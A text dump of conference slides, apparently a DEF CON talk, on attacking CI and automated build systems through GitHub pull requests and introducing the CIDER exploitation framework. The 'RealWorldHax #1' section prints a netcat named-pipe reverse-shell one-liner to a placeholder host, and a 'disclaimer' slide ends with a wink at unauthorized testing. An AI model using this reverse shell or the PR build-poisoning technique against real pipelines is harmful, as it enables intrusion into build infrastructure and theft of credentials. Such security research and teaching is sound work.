exploiting continuous integration (ci) and automated build … con 25/def con 25... ·...
Post on 22-May-2020
2 Views
Preview:
TRANSCRIPT
Exploiting Continuous Integration (CI) and
Automated Build Systems
And introducing CIDER
Whoami
• SpaceB0x• Sr.SecurityEngineeratLeanKit• Applicationandnetworksecurity(offenseanddefense)• Ilikebreakingintosystems,buildingsystems,andlearning• Securityconsultant
./agenda.sh
• OverviewofContinuousIntegrationconcepts• ConfigurationVulnerabilitiesvs.ApplicationVulnerabilities• Realworldexploit#1• CommonBad-practices• Realworldexploit#2– AttackingtheCIprovider• IntroduceCIDER
ContinuousIntegration
ContinuousIntegration(CI)
• Quickiterativereleaseofcodetoproductionservers• UsuallyManyiterationsperweekorevenperday.• Repositorycentric• InsyncwithAutomatedBuild• Forinfrastructure/servers/subnetsetc.
Microservices
• Breakingdownlargeappintosmalldecoupledcomponents• Thesecomponentsinteractwitheachother• Eliminatessinglepointsoffailure• Autonomousdevelopment
SecurityImplications
• Good- Frequentreleasecyclesarefabulous!• Good- Fastercodedeployments=quickremediation• Good- Decoupledsystemsreducedsinglepointsoffailure• Good- Compromiseofoneservicedoesn’t(always)meanfullpwnage
SecurityImplications
• Good- Frequentreleasecyclesarefabulous!• Good- Fastercodedeployments=quickremediation• Good- Decoupledsystemsreducedsinglepointsoffailure• Good- Compromiseofoneservicedoesn’t(always)meanfullpwnage
• Bad- Fastreleasesometimesmeanshastyoversights• Bad– AutomatedDeploymentsystemsarechecked lessthanthecodethattheydeploy
Tools
BuildSystems
• Takecodeandbuildconditionally• Typicallyinaquasicontainerizedtypeofenvironment• Bothlocalandcloudbasedarepopular
• Vendor:ØTravis-CIØCircle-CIØDroneØTeamCityØBuildKite
DeploymentSystems
• Deploythecodeafterbuild• Headingmoreandmoretowardcontainerdriven
• VendorsØJenkinsØOctopusDeployØKubernetesØRancherØMesosphere
ChainsofDeployment
ChainsofDeployment
Chainsofdeployment
ChecksintheSDLC
• Buildtestbeforemerges• Web-hookstriggerspecificactionsbasedonconditions• Servicesconfiguredwithoutregardtooneanother
ConfigurationProblems
GitHub– Hugeattacksurface
• Pullrequestsandcommitstriggerbuilds• Buildconfigurationsnormallyinrootofrepo• Thusbuildconfig changecanbepartofPRorcommit• Gaincontrolofmultiplesystemsthroughpullrequests
VulnerabilitiesareinMisconfiguration
• Creativeconfigurationexploitation• Vuln stackingatit’sfinest• Eachindividualservicemaybefunctioningexactlyasintended• Interactionbetweenservicesiswheremanyvulnerabilitieslie
ExternalRepos
• Mostvolatileattacksurface• Publicrepositorieswhichmaptointernalbuildservices
RealWorldHax #1
mknod /tmp/backpipe p
mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe
mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe
nc –l 4444
root
Bad-PracticesWorst-Practices
EnvironmentVars
• Beingusedtostorecredentials• Storingmetadataforotherserviceswithinmicro-serviceinfrastructure
Runeverythingasroot
• Justacontainer,rightguyz?• Younowhaveinternalnetworkaccess• Fullcontroltobuildaugmenttheimage
CIProviderInfoleak
• ProblemswiththeCIProvidersthemselves• LeakSSHkeys,etc.whichcancompromiseothercustomersonhost• CIprovidershaveatleastsomepermissionstoGitHubrepos• CloudbasedCIprovidershaveahostingenvironment• Speakingofwhich…
RealWorldHax #2
IntroducingCIDER
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices• Takesthemessoutforking,PR-ing,callbacking
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices• Takesthemessoutforking,PR-ing,callbacking• Itwillpoisonahandfulofbuildservicesand”exploits”foreachone
WhyCIDER?
• Fun• Makeattackingeasy• Awareness• RottenApple by@claudijd• Facilitatefurtherresearch
CIDERoverview
CIDER– ‘help’
CIDER– ‘addtarget’&‘listtargets’
CIDER– ‘load’and‘info’
CIDERfeatures
• Node.JS• Buildmodularly• Canhandlebulklistsoftargetrepos• CleanupforGitHubrepocraziness• Ngrok – becauseportforwardingandpublicIPssuck
Ngrok
Disclaimer
• ItisagainsttheGitHubuseragreementtotestagainstarepository,evenifyouhavepermissionfromtheowneroftherepo
• Youmustbetheownertotestarepo• Whentestingaskthemtomakeyouanowner
WINKWINK
DEMO
Limitations
• BuildQueues• GitHubNoise• Timeouts• RepoAPIrequestthrottling
Justthebeginning…
• MoreCI-Frameworks• Starttacklingdeploymentservices• Startexploringotherentrypoints
• Othercoderepositories• ChatOps (Slack)
Thanks
• LeanKitOperationsTeam• EvanSnapp• @claudijd
Fin
CIDERonGithub: https://github.com/spaceB0x/cider
Twitter:@spaceB0xxwww.untamedtheory.com
top related